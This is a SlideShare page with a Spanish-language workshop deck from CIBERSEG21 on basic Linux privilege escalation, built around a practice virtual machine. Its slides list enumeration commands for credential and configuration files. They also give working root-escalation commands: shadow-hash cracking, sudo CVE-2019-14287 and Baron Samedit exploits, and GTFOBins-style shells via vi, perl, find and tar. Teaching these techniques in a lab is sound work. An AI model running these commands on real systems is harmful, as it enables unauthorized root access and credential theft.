SlideShare una empresa de Scribd logo

Workshop Privesc Escalada de Privilegios Basica Linux CIBERSEG21

1v4n (a.k.a. 1r0Dm48O)
1v4n (a.k.a. 1r0Dm48O)

One of the most important phases of pentesting, where vulnerabilities are detected in an authorized way, is the Escalation of Privileges (Privesc). In this phase they try to find a way to scale between the accounts of the system. For many security researchers this is a fascinating phase. We will use scenarios hosted in a Linux virtual machine (.ova), we will assume that we have already gained access to the machine's scenarios and we will go from a non-privileged user to root in Linux. We will do some basic privilege escalation techniques on Linux. Automated tools will not be used. Source .ova https://mega.nz/file/r01HUKZQ#SkXRpnF0uVo_rmprgsvcKU8dB_UKdbTnYZIxfNHsn20

Tecnología
1 de 32
Privesc - Escalada de Privilegios básica en Linux #CibersegVII Track #Talleres
Disclaimer / Aviso Legal y Descargo de Responsabilidad >_1. El objetivo de este taller es mejorar nuestro conocimientos de Ciberseguridad. >_2. Los conocimientos que os vamos a intentar transmitir, están dirigidos a una práctica ética, si los usáis para practicas no adecuadas ni en consonancia con la legislación sería únicamente responsabilidad vuestra. >_3. No nos hacemos responsables del mal uso que se le pueda dar a las herramientas y habilidades que mostremos.
>_ La asociación Honey Sec es una asociación sin ánimo de lucro ubicada en la ciudad de Guadalajara (España), que busca como objetivo fomentar buenas prácticas en materia de seguridad informática y en el uso de las nuevas tecnologías. La asociación está conformada por personas con un alto interés en temas de ciberseguridad y que participan activamente en las distintas comunidades establecidas a nivel nacional.
>_Privesc - Escalada de Privilegios básica en Linux ~# whoami >_1Ꮩ4η Ꮢ @1r0Dm48O >_Miembro de @HoneySec >_Co-fundador de @H4ck3rs4FunCTF >_Cibercooperante del @Incibe … ~#cat mission Realizaremos algunas técnicas básicas de escalado de privilegios en Linux…
>_Descargar .ova(MD5 b9ceb1bf1e0f55e8ed4da2598497dc41) >_Importar maquina a VirtualBox >_Misma Red Nat la maquina y nuestro Kali o Ubuntu >_Tomar instantánea & RUN ~# cat deploy_machine (ciberseg21:PrivescLab) >_Privesc - Escalada de Privilegios básica en Linux
>_Kernel exploits (DirtyCOW) >_Programas ejecutándose “as root” (GTFOBINS) >_Vulns/Exploits servicios >_Daemons (sshd,nfsd,apache2,exim) >_Password Mining(Memory,Files,Hist…) >_SUID/GUID malconfigurado ~# find . ways_to_privesc_Linux_1_2 >_Privesc - Escalada de Privilegios básica en Linux
>_Abuso “sudo-rights” >_scripts editables “invoked by root” >_Directorios/Files malconfigurados >_cronjobs >_Unmounted filesystems ~# find ways_to_privesc_Linux_2_2 >_Privesc - Escalada de Privilegios básica en Linux
>_Read/Write/Delete any sensitive file >_Persist easily between reboots >_Insert a permanent backdoor ~# cat targets_privesc >_Privesc - Escalada de Privilegios básica en Linux
>_Enumeración && Enumeración && Enum… >_Analizar - Procesar los datos >_Saber lo que buscar y buscar exploit >_Adaptar el exploit (Customize) >_Éxito y error ~# find . steps_to_privesc >_Privesc - Escalada de Privilegios básica en Linux
$ cat /etc/issue $ cat /etc/*-release $ cat /etc/lsb-release $ lsb-release $ cat /proc/version $ uname –a $ cat /etc/profile $ cat /etc/bashrc $ cat ~/.bash_profile $ cat ~/.bashrc $ cat ~/.bash_logout $ env $ set ~# cat enum os_env_privesc_Linux >_Privesc - Escalada de Privilegios básica en Linux
$ ps aux $ ps -ef $ top $ ps aux | grep root $ ps -ef | grep root $ ls -alh /usr/bin/ $ ls -alh /sbin/ $ dpkg -l ~# cat enum app_serv_privesc_Linux >_Privesc - Escalada de Privilegios básica en Linux
$ cat /etc/syslog.conf $ cat /etc/chttp.conf $ cat /etc/lighttpd.conf $ cat /etc/cups/cupsd.conf $ cat /etc/inetd.conf $ cat /etc/apache2/apache2.conf $ cat /etc/my.conf $ cat /etc/httpd/conf/httpd.conf $ cat /opt/lampp/etc/httpd.conf $ ls -aRl /etc/ | awk '$1 ~ /^.*r.*/ ~# cat enum app_serv_privesc_Linux >_Privesc - Escalada de Privilegios básica en Linux
>_SUID (Set User-ID) && GUID (Set Group-ID) $ find / -perm /4000 2>/dev/null $ find / -perm -2000 2>/dev/null $ find / -perm -u=s -type f 2>/dev/null $ find / -perm -g=s -type f 2>/dev/null $ find / -perm 2 ! -type l –ls $ find / -xdev (-perm 4000) -type f -print0 -exec ls -s {} ; $ find / -user root -perm -4000 -exec ls -ldb {} ; ~# cat enum suid_guid_privesc_Linux >_Privesc - Escalada de Privilegios básica en Linux
>_SUDO rigths $ sudo –l $ sudo –V $ cat /etc/sudoers $ sudoedit -s '' `python -c 'print("A"*1000)'` $ sudoedit -s '' `perl -e 'print "A" x 65536'` ~# cat enum sudo_privesc_Linux >_Privesc - Escalada de Privilegios básica en Linux
>_Scripts invoke to root $ find / -writable -type d 2>/dev/null $ find / -perm -222 -type d 2>/dev/null $ find / -perm -o w -type d 2>/dev/null $ find / -perm -o x -type d 2>/dev/null $ find / ( -perm -o w -perm -o x ) -type d 2>/dev/null ~# cat enum scripst_privesc_Linux >_Privesc - Escalada de Privilegios básica en Linux
$ ls –l /etc/shadow $ ls –l /etc/passwd $ find / -not -type l -perm -o+w ~# cat weak_perm_privesc_Linux >_Privesc - Escalada de Privilegios básica en Linux
>_cronjob $ crontab –l $ ls -la /etc/cron.d $ find / -perm -2 -type f 2>/dev/null | grep cron $ ls -alh /var/spool/cron $ ls -al /etc/ | grep cron $ ls -al /etc/cron* $ cat /etc/cron* $ cat /etc/at.allow $ cat /etc/at.deny $ cat /etc/cron.allow $ cat /etc/cron.deny $ cat /etc/crontab $ cat /etc/anacrontab $ cat /var/spool/cron/crontabs/root ~# cat enum cronjob_privesc_Linux >_Privesc - Escalada de Privilegios básica en Linux
$ cd /tmp $ cd /var/tmp $ cd /dev/shm $ cd /var/spool/vbox $ cd /var/spool/samba ~# cat enum usefull_paths_privesc_Linux >_Privesc - Escalada de Privilegios básica en Linux
$ grep -i user [filename] $ grep -i pass [filename] $ grep -C 5 "password" [filename] $ find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" ~# cat enum passwords_privesc_Linux >_Privesc - Escalada de Privilegios básica en Linux
$ /sbin/ifconfig –a $ cat /etc/network/interfaces $ cat /etc/sysconfig/network $ lsof -i $ lsof -i :80 $ grep 80 /etc/services $ netstat -antup $ netstat –antpx $ netstat -tulpn $ chkconfig –list $ chkconfig --list | grep 3:on $ last $ w $ arp –a $ route $ /sbin/route -nee $ cat /etc/resolv.conf $ cat /etc/sysconfig/network $ cat /etc/networks $ iptables –L $ hostname $ dnsdomainname ~# cat enum network_privesc_Linux >_Privesc - Escalada de Privilegios básica en Linux
>_LinEnum (https://github.com/rebootuser/LinEnum ) >_LinuxPrivChecker (https://github.com/sleventyeleven/linuxprivchecker) >_RootHelper (https://github.com/NullArray/RootHelper ) >_LinPEAS (https://github.com/carlospolop/privilege- escalation-awesome-scripts-suite/tree/master/linPEAS) >_linux-smart-enumeration (https://github.com/diego- treitos/linux-smart-enumeration) >_uptux (https://github.com/initstring/uptux) >_post/multi/recon/local_exploit_suggester (Metasploit) ~# cat scripts_recon_privesc_Linux >_Privesc - Escalada de Privilegios básica en Linux
>_Privesc - Escalada de Privilegios básica en Linux >_Demo
1. Weak file/Dir permissions ssh -p 20000 ciberseg@IP Recon $ ls –l /etc/shadow $ ls –l /etc/passwd Explota (Kali) $ cat /etc/shadow $ john --wordlist=/usr/share/wordlists/rockyou.txt hash $ su root ~# cat lab_Linux (ciberseg:ciberseg) >_Privesc - Escalada de Privilegios básica en Linux
1 Weak file/Dir permissions Explota (rockyou) $ ls -l /etc/shadow $ mkpasswd -m sha-512 newpasswordhere $ su root ------------ $ ls -l /etc/passwd $ openssl passwd newpasswordhere $ su root ~# cat lab_Linux (ciberseg:ciberseg) >_Privesc - Escalada de Privilegios básica en Linux
2. Script as root & sudoers abusing $ ssh -p 40000 ciberseg@IP Recon $ sudo –l Explota $ echo "/bin/bash -i" >> $ chmod +x $ sudo ./ ---------- >_Privesc - Escalada de Privilegios básica en Linux ~# cat lab_Linux (ciberseg:ciberseg)
2. Script as root & Suders abusing Explota $ sudo vi -c '!bash‘ ----------- $ nano /var/opt/../../etc/sudoers $ sudo –i https://medium.com/schkn/linux-privilege-escalation-using- text-editors-and-files-part-1-a8373396708d >_Privesc - Escalada de Privilegios básica en Linux ~# cat lab_Linux (ciberseg:ciberseg)
3. CVE-2019-14287 sudoers $ ssh -p 50000 ciberseg@IP Recon $ sudo –l Explota $ sudo -l $ sudo -u#-1 /bin/bash https://www.hackingarticles.in/sudo-security-policy-bypass- vulnerability-cve-2019-14287/ https://www.sudo.ws/alerts/minus_1_uid.html >_Privesc - Escalada de Privilegios básica en Linux ~# cat lab_Linux (ciberseg:ciberseg)
4. Perls explotation $ ssh -p 60000 ciberseg@IP Recon $ sudo –l Explota $ sudo perl -e ‘exec "/bin/bash";‘ https://gtfobins.github.io/gtfobins/perl/#shell >_Privesc - Escalada de Privilegios básica en Linux ~# cat lab_Linux (ciberseg:ciberseg)
5. Abusing SUID $ ssh -p 61000 ciberseg@IP Recon $ find / -user root -perm -4000 -exec ls -ldb {} ; Explota $ touch ciberseg find ciberseg -exec /bin/bash ; -quit $ whoami https://www.hackingarticles.in/linux-privilege-escalation- using-suid-binaries/ >_Privesc - Escalada de Privilegios básica en Linux ~# cat lab_Linux (ciberseg:ciberseg)
6. CVE-2021-3156 sudo is vulnerable $ ssh -p 64000 ciberseg@IP Recon $ sudo –V Explota $ Make $ ./exploit https://blog.qualys.com/vulnerabilities- research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow- in-sudo-baron-samedit https://github.com/CptGibbon/CVE-2021-3156 >_Privesc - Escalada de Privilegios básica en Linux ~# cat lab_Linux (ciberseg:ciberseg)
7. Capabilities $ ssh -p 65000 ciberseg@IP Recon $ getcap -r / 2>/dev/null $ which tar Explota $ sudo setcap cap_dac_read_search=ep /bin/tar $ tar -cvf shadow_backup.tar /etc/shadow $ ls -la shadow_backup.tar $ tar -xzvf shadow_backup.tar >_Privesc - Escalada de Privilegios básica en Linux ~# cat lab_Linux (ciberseg:ciberseg)
>_Privesc - Escalada de Privilegios básica en Linux Thanks! You can find me at @1r0Dm48O 👍

Recomendados

05.asterisk instalacion
05.asterisk instalacion05.asterisk instalacion
05.asterisk instalacionDelphini Systems Consultoria e Treinamento
 
Cómo crear una distribución Linux
Cómo crear una distribución LinuxCómo crear una distribución Linux
Cómo crear una distribución LinuxMauro Parra-Miranda
 
Intro
IntroIntro
IntroUriel Cambrón Hernández
 
Comandos unix linux
Comandos unix linuxComandos unix linux
Comandos unix linuxCkybaker Chopp
 
Taller Linea de Comandos - Linuxec 29o
Taller Linea de Comandos - Linuxec 29oTaller Linea de Comandos - Linuxec 29o
Taller Linea de Comandos - Linuxec 29oTomás Vírseda
 
Fedora
FedoraFedora
Fedorabachispasaca
 
Leccion03
Leccion03Leccion03
Leccion03sgonzales2012
 
Los mejores trucos de Asterisk
Los mejores trucos de AsteriskLos mejores trucos de Asterisk
Los mejores trucos de AsteriskDavid Motta Baldarrago
 

Recomendados

05.asterisk instalacion
05.asterisk instalacion05.asterisk instalacion
05.asterisk instalacionDelphini Systems Consultoria e Treinamento
 
Cómo crear una distribución Linux
Cómo crear una distribución LinuxCómo crear una distribución Linux
Cómo crear una distribución LinuxMauro Parra-Miranda
 
Intro
IntroIntro
IntroUriel Cambrón Hernández
 
Comandos unix linux
Comandos unix linuxComandos unix linux
Comandos unix linuxCkybaker Chopp
 
Taller Linea de Comandos - Linuxec 29o
Taller Linea de Comandos - Linuxec 29oTaller Linea de Comandos - Linuxec 29o
Taller Linea de Comandos - Linuxec 29oTomás Vírseda
 
Fedora
FedoraFedora
Fedorabachispasaca
 
Leccion03
Leccion03Leccion03
Leccion03sgonzales2012
 
Los mejores trucos de Asterisk
Los mejores trucos de AsteriskLos mejores trucos de Asterisk
Los mejores trucos de AsteriskDavid Motta Baldarrago
 
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]RootedCON
 
Curso GNU/Linux
Curso GNU/LinuxCurso GNU/Linux
Curso GNU/Linuxcorchero83
 
Linux basico-3.PDF
Linux basico-3.PDFLinux basico-3.PDF
Linux basico-3.PDFULEAM
 
Manejo de ficheros en Linux
Manejo de ficheros en LinuxManejo de ficheros en Linux
Manejo de ficheros en Linuxguest21f6be1
 
Comandos linux
Comandos linuxComandos linux
Comandos linuxMaciel Rodelo Alvarez
 
Consola
ConsolaConsola
ConsolaRaul Villamor
 
José Ramón Palanco - NoSQL Security [RootedCON 2011]
José Ramón Palanco - NoSQL Security [RootedCON 2011]José Ramón Palanco - NoSQL Security [RootedCON 2011]
José Ramón Palanco - NoSQL Security [RootedCON 2011]RootedCON
 
Ayuda
AyudaAyuda
AyudaOmar Arias Rodriguez
 
Distribucion_aplicaciones
Distribucion_aplicacionesDistribucion_aplicaciones
Distribucion_aplicacionesJuanjo Marin
 
Clase6 (consola linux)
Clase6 (consola linux)Clase6 (consola linux)
Clase6 (consola linux)Miguel Eduardo Luces
 
Administracion de software en debian y derivados (comandos) taringa!
Administracion de software en debian y derivados (comandos) taringa!Administracion de software en debian y derivados (comandos) taringa!
Administracion de software en debian y derivados (comandos) taringa!Frank Davila
 
Webinar Gratuito "Samurai Web Testing Framework 2.0"
Webinar Gratuito "Samurai Web Testing Framework 2.0"Webinar Gratuito "Samurai Web Testing Framework 2.0"
Webinar Gratuito "Samurai Web Testing Framework 2.0"Alonso Caballero
 
Introducción a GNU - POSIX - LINUX
Introducción a GNU - POSIX - LINUXIntroducción a GNU - POSIX - LINUX
Introducción a GNU - POSIX - LINUXJose Pla
 
Memorias
MemoriasMemorias
Memoriasnandobhe
 
Curso Basico Ponencia 1
Curso Basico Ponencia 1Curso Basico Ponencia 1
Curso Basico Ponencia 1Antonio Durán
 
RESUME SOBRE LA TERMINAL DE UBUNTU
RESUME SOBRE LA TERMINAL DE UBUNTU RESUME SOBRE LA TERMINAL DE UBUNTU
RESUME SOBRE LA TERMINAL DE UBUNTU Mary Tenelema
 
PostgreSQL À la Debian
PostgreSQL À la DebianPostgreSQL À la Debian
PostgreSQL À la DebianLeonardo Cezar
 
PostgreSQL À la Debian
PostgreSQL À la DebianPostgreSQL À la Debian
PostgreSQL À la DebianLeonardo Cezar
 
2.6.montajes y accesos a medios
2.6.montajes y accesos a medios2.6.montajes y accesos a medios
2.6.montajes y accesos a mediosFernando Solis
 
Instalacion de herramientas
Instalacion de herramientasInstalacion de herramientas
Instalacion de herramientasCristianParada13
 
Comandos de ubuntu
Comandos de ubuntuComandos de ubuntu
Comandos de ubuntuAny Saula
 
Trabajo zabbix
Trabajo zabbixTrabajo zabbix
Trabajo zabbixjohanapreciosa
 

Más contenido relacionado

La actualidad más candente

Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]RootedCON
 
Curso GNU/Linux
Curso GNU/LinuxCurso GNU/Linux
Curso GNU/Linuxcorchero83
 
Linux basico-3.PDF
Linux basico-3.PDFLinux basico-3.PDF
Linux basico-3.PDFULEAM
 
Manejo de ficheros en Linux
Manejo de ficheros en LinuxManejo de ficheros en Linux
Manejo de ficheros en Linuxguest21f6be1
 
José Ramón Palanco - NoSQL Security [RootedCON 2011]
José Ramón Palanco - NoSQL Security [RootedCON 2011]José Ramón Palanco - NoSQL Security [RootedCON 2011]
José Ramón Palanco - NoSQL Security [RootedCON 2011]RootedCON
 

La actualidad más candente (8)

Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
 
Curso GNU/Linux
Curso GNU/LinuxCurso GNU/Linux
Curso GNU/Linux
 
Linux basico-3.PDF
Linux basico-3.PDFLinux basico-3.PDF
Linux basico-3.PDF
 
Manejo de ficheros en Linux
Manejo de ficheros en LinuxManejo de ficheros en Linux
Manejo de ficheros en Linux
 
Comandos linux
Comandos linuxComandos linux
Comandos linux
 
Consola
ConsolaConsola
Consola
 
José Ramón Palanco - NoSQL Security [RootedCON 2011]
José Ramón Palanco - NoSQL Security [RootedCON 2011]José Ramón Palanco - NoSQL Security [RootedCON 2011]
José Ramón Palanco - NoSQL Security [RootedCON 2011]
 
Ayuda
AyudaAyuda
Ayuda
 

Similar a Workshop Privesc Escalada de Privilegios Basica Linux CIBERSEG21

Distribucion_aplicaciones
Distribucion_aplicacionesDistribucion_aplicaciones
Distribucion_aplicacionesJuanjo Marin
 
Administracion de software en debian y derivados (comandos) taringa!
Administracion de software en debian y derivados (comandos) taringa!Administracion de software en debian y derivados (comandos) taringa!
Administracion de software en debian y derivados (comandos) taringa!Frank Davila
 
Webinar Gratuito "Samurai Web Testing Framework 2.0"
Webinar Gratuito "Samurai Web Testing Framework 2.0"Webinar Gratuito "Samurai Web Testing Framework 2.0"
Webinar Gratuito "Samurai Web Testing Framework 2.0"Alonso Caballero
 
Introducción a GNU - POSIX - LINUX
Introducción a GNU - POSIX - LINUXIntroducción a GNU - POSIX - LINUX
Introducción a GNU - POSIX - LINUXJose Pla
 
Curso Basico Ponencia 1
Curso Basico Ponencia 1Curso Basico Ponencia 1
Curso Basico Ponencia 1Antonio Durán
 
RESUME SOBRE LA TERMINAL DE UBUNTU
RESUME SOBRE LA TERMINAL DE UBUNTU RESUME SOBRE LA TERMINAL DE UBUNTU
RESUME SOBRE LA TERMINAL DE UBUNTU Mary Tenelema
 
PostgreSQL À la Debian
PostgreSQL À la DebianPostgreSQL À la Debian
PostgreSQL À la DebianLeonardo Cezar
 
PostgreSQL À la Debian
PostgreSQL À la DebianPostgreSQL À la Debian
PostgreSQL À la DebianLeonardo Cezar
 
2.6.montajes y accesos a medios
2.6.montajes y accesos a medios2.6.montajes y accesos a medios
2.6.montajes y accesos a mediosFernando Solis
 
Instalacion de herramientas
Instalacion de herramientasInstalacion de herramientas
Instalacion de herramientasCristianParada13
 
Comandos de ubuntu
Comandos de ubuntuComandos de ubuntu
Comandos de ubuntuAny Saula
 
Webinar Gratuito "Informática Forense & Linux"
Webinar Gratuito "Informática Forense & Linux"Webinar Gratuito "Informática Forense & Linux"
Webinar Gratuito "Informática Forense & Linux"Alonso Caballero
 
Linux basico-7.PDF
Linux basico-7.PDFLinux basico-7.PDF
Linux basico-7.PDFULEAM
 
ADMINISTRACION DE PAQUETES ::: http://leymebamba.com
ADMINISTRACION DE PAQUETES ::: http://leymebamba.comADMINISTRACION DE PAQUETES ::: http://leymebamba.com
ADMINISTRACION DE PAQUETES ::: http://leymebamba.com{|::::::. ELDAVAN .:::::::|}
 

Similar a Workshop Privesc Escalada de Privilegios Basica Linux CIBERSEG21 (20)

Distribucion_aplicaciones
Distribucion_aplicacionesDistribucion_aplicaciones
Distribucion_aplicaciones
 
Clase6 (consola linux)
Clase6 (consola linux)Clase6 (consola linux)
Clase6 (consola linux)
 
Administracion de software en debian y derivados (comandos) taringa!
Administracion de software en debian y derivados (comandos) taringa!Administracion de software en debian y derivados (comandos) taringa!
Administracion de software en debian y derivados (comandos) taringa!
 
Webinar Gratuito "Samurai Web Testing Framework 2.0"
Webinar Gratuito "Samurai Web Testing Framework 2.0"Webinar Gratuito "Samurai Web Testing Framework 2.0"
Webinar Gratuito "Samurai Web Testing Framework 2.0"
 
Introducción a GNU - POSIX - LINUX
Introducción a GNU - POSIX - LINUXIntroducción a GNU - POSIX - LINUX
Introducción a GNU - POSIX - LINUX
 
Memorias
MemoriasMemorias
Memorias
 
Curso Basico Ponencia 1
Curso Basico Ponencia 1Curso Basico Ponencia 1
Curso Basico Ponencia 1
 
RESUME SOBRE LA TERMINAL DE UBUNTU
RESUME SOBRE LA TERMINAL DE UBUNTU RESUME SOBRE LA TERMINAL DE UBUNTU
RESUME SOBRE LA TERMINAL DE UBUNTU
 
PostgreSQL À la Debian
PostgreSQL À la DebianPostgreSQL À la Debian
PostgreSQL À la Debian
 
PostgreSQL À la Debian
PostgreSQL À la DebianPostgreSQL À la Debian
PostgreSQL À la Debian
 
2.6.montajes y accesos a medios
2.6.montajes y accesos a medios2.6.montajes y accesos a medios
2.6.montajes y accesos a medios
 
Instalacion de herramientas
Instalacion de herramientasInstalacion de herramientas
Instalacion de herramientas
 
Comandos de ubuntu
Comandos de ubuntuComandos de ubuntu
Comandos de ubuntu
 
Trabajo zabbix
Trabajo zabbixTrabajo zabbix
Trabajo zabbix
 
Webinar Gratuito "Informática Forense & Linux"
Webinar Gratuito "Informática Forense & Linux"Webinar Gratuito "Informática Forense & Linux"
Webinar Gratuito "Informática Forense & Linux"
 
Linux basico-7.PDF
Linux basico-7.PDFLinux basico-7.PDF
Linux basico-7.PDF
 
Dispositivos
DispositivosDispositivos
Dispositivos
 
Docker y PostgreSQL
Docker y PostgreSQLDocker y PostgreSQL
Docker y PostgreSQL
 
ADMINISTRACION DE PAQUETES ::: http://leymebamba.com
ADMINISTRACION DE PAQUETES ::: http://leymebamba.comADMINISTRACION DE PAQUETES ::: http://leymebamba.com
ADMINISTRACION DE PAQUETES ::: http://leymebamba.com
 
Kitsune documentation
Kitsune documentationKitsune documentation
Kitsune documentation
 

Último

Proyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptxProyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptx241521559
 
Trabajo Mas Completo De Excel en clase tecnología
Trabajo Mas Completo De Excel en clase tecnologíaTrabajo Mas Completo De Excel en clase tecnología
Trabajo Mas Completo De Excel en clase tecnologíassuserf18419
 
EPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial UninoveEPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial UninoveFagnerLisboa3
 
La era de la educación digital y sus desafios
La era de la educación digital y sus desafiosLa era de la educación digital y sus desafios
La era de la educación digital y sus desafiosFundación YOD YOD
 
Hernandez_Hernandez_Practica web de la sesion 12.pptx
Hernandez_Hernandez_Practica web de la sesion 12.pptxHernandez_Hernandez_Practica web de la sesion 12.pptx
Hernandez_Hernandez_Practica web de la sesion 12.pptxJOSEMANUELHERNANDEZH11
 
KELA Presentacion Costa Rica 2024 - evento Protégeles
KELA Presentacion Costa Rica 2024 - evento ProtégelesKELA Presentacion Costa Rica 2024 - evento Protégeles
KELA Presentacion Costa Rica 2024 - evento ProtégelesFundación YOD YOD
 
trabajotecologiaisabella-240424003133-8f126965.pdf
trabajotecologiaisabella-240424003133-8f126965.pdftrabajotecologiaisabella-240424003133-8f126965.pdf
trabajotecologiaisabella-240424003133-8f126965.pdfIsabellaMontaomurill
 
9egb-lengua y Literatura.pdf_texto del estudiante
9egb-lengua y Literatura.pdf_texto del estudiante9egb-lengua y Literatura.pdf_texto del estudiante
9egb-lengua y Literatura.pdf_texto del estudianteAndreaHuertas24
 
CLASE DE TECNOLOGIA E INFORMATICA PRIMARIA
CLASE DE TECNOLOGIA E INFORMATICA PRIMARIACLASE DE TECNOLOGIA E INFORMATICA PRIMARIA
CLASE DE TECNOLOGIA E INFORMATICA PRIMARIAWilbisVega
 
Plan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docxPlan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docxpabonheidy28
 
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...silviayucra2
 
Cortes-24-de-abril-Tungurahua-3 año 2024
Cortes-24-de-abril-Tungurahua-3 año 2024Cortes-24-de-abril-Tungurahua-3 año 2024
Cortes-24-de-abril-Tungurahua-3 año 2024GiovanniJavierHidalg
 
Global Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft FabricGlobal Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft FabricKeyla Dolores Méndez
 
Redes direccionamiento y subredes ipv4 2024 .pdf
Redes direccionamiento y subredes ipv4 2024 .pdfRedes direccionamiento y subredes ipv4 2024 .pdf
Redes direccionamiento y subredes ipv4 2024 .pdfsoporteupcology
 
International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)GDGSucre
 
guía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan Josephguía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan JosephBRAYANJOSEPHPEREZGOM
 

Último (16)

Proyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptxProyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptx
 
Trabajo Mas Completo De Excel en clase tecnología
Trabajo Mas Completo De Excel en clase tecnologíaTrabajo Mas Completo De Excel en clase tecnología
Trabajo Mas Completo De Excel en clase tecnología
 
EPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial UninoveEPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial Uninove
 
La era de la educación digital y sus desafios
La era de la educación digital y sus desafiosLa era de la educación digital y sus desafios
La era de la educación digital y sus desafios
 
Hernandez_Hernandez_Practica web de la sesion 12.pptx
Hernandez_Hernandez_Practica web de la sesion 12.pptxHernandez_Hernandez_Practica web de la sesion 12.pptx
Hernandez_Hernandez_Practica web de la sesion 12.pptx
 
KELA Presentacion Costa Rica 2024 - evento Protégeles
KELA Presentacion Costa Rica 2024 - evento ProtégelesKELA Presentacion Costa Rica 2024 - evento Protégeles
KELA Presentacion Costa Rica 2024 - evento Protégeles
 
trabajotecologiaisabella-240424003133-8f126965.pdf
trabajotecologiaisabella-240424003133-8f126965.pdftrabajotecologiaisabella-240424003133-8f126965.pdf
trabajotecologiaisabella-240424003133-8f126965.pdf
 
9egb-lengua y Literatura.pdf_texto del estudiante
9egb-lengua y Literatura.pdf_texto del estudiante9egb-lengua y Literatura.pdf_texto del estudiante
9egb-lengua y Literatura.pdf_texto del estudiante
 
CLASE DE TECNOLOGIA E INFORMATICA PRIMARIA
CLASE DE TECNOLOGIA E INFORMATICA PRIMARIACLASE DE TECNOLOGIA E INFORMATICA PRIMARIA
CLASE DE TECNOLOGIA E INFORMATICA PRIMARIA
 
Plan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docxPlan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docx
 
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
 
Cortes-24-de-abril-Tungurahua-3 año 2024
Cortes-24-de-abril-Tungurahua-3 año 2024Cortes-24-de-abril-Tungurahua-3 año 2024
Cortes-24-de-abril-Tungurahua-3 año 2024
 
Global Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft FabricGlobal Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft Fabric
 
Redes direccionamiento y subredes ipv4 2024 .pdf
Redes direccionamiento y subredes ipv4 2024 .pdfRedes direccionamiento y subredes ipv4 2024 .pdf
Redes direccionamiento y subredes ipv4 2024 .pdf
 
International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)
 
guía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan Josephguía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan Joseph
 

Workshop Privesc Escalada de Privilegios Basica Linux CIBERSEG21

  • 1. Privesc - Escalada de Privilegios básica en Linux #CibersegVII Track #Talleres
  • 2. Disclaimer / Aviso Legal y Descargo de Responsabilidad >_1. El objetivo de este taller es mejorar nuestro conocimientos de Ciberseguridad. >_2. Los conocimientos que os vamos a intentar transmitir, están dirigidos a una práctica ética, si los usáis para practicas no adecuadas ni en consonancia con la legislación sería únicamente responsabilidad vuestra. >_3. No nos hacemos responsables del mal uso que se le pueda dar a las herramientas y habilidades que mostremos.
  • 3. >_ La asociación Honey Sec es una asociación sin ánimo de lucro ubicada en la ciudad de Guadalajara (España), que busca como objetivo fomentar buenas prácticas en materia de seguridad informática y en el uso de las nuevas tecnologías. La asociación está conformada por personas con un alto interés en temas de ciberseguridad y que participan activamente en las distintas comunidades establecidas a nivel nacional.
  • 4. >_Privesc - Escalada de Privilegios básica en Linux ~# whoami >_1Ꮩ4η Ꮢ @1r0Dm48O >_Miembro de @HoneySec >_Co-fundador de @H4ck3rs4FunCTF >_Cibercooperante del @Incibe … ~#cat mission Realizaremos algunas técnicas básicas de escalado de privilegios en Linux…
